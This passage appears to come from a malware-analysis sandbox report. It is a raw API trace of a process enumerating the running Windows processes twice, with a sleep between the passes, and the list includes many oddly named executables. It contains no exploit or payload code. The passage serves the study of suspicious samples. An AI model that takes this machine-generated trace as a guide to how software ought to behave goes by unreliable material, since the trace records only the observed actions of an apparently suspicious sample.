[0135.715] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0135.720] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0135.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0135.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.723] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0135.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0135.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0135.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0135.726] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0135.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0135.727] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.728] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.729] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.730] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0135.731] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.732] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.733] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0135.734] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.735] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.736] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0135.737] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0135.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0135.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0135.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0135.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0135.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0135.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0135.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0135.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0135.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0135.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0135.777] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0135.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0135.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0135.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0135.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0135.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0135.784] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0135.785] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0135.786] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0135.788] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0135.789] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0135.790] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0135.791] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0135.792] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0135.793] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0135.795] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0135.796] CloseHandle (hObject=0xbc) returned 1 [0135.796] Sleep (dwMilliseconds=0x12c) [0136.514] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0136.519] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0136.520] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0136.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0136.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0136.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0136.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0136.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0136.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0136.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0136.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0136.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0136.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0136.544] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0136.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0136.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0136.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0136.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0136.550] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0136.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0136.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0136.554] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 